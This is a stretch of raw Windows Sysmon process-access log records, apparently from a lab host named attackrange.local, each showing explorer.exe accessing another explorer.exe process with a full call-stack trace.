16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002246268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 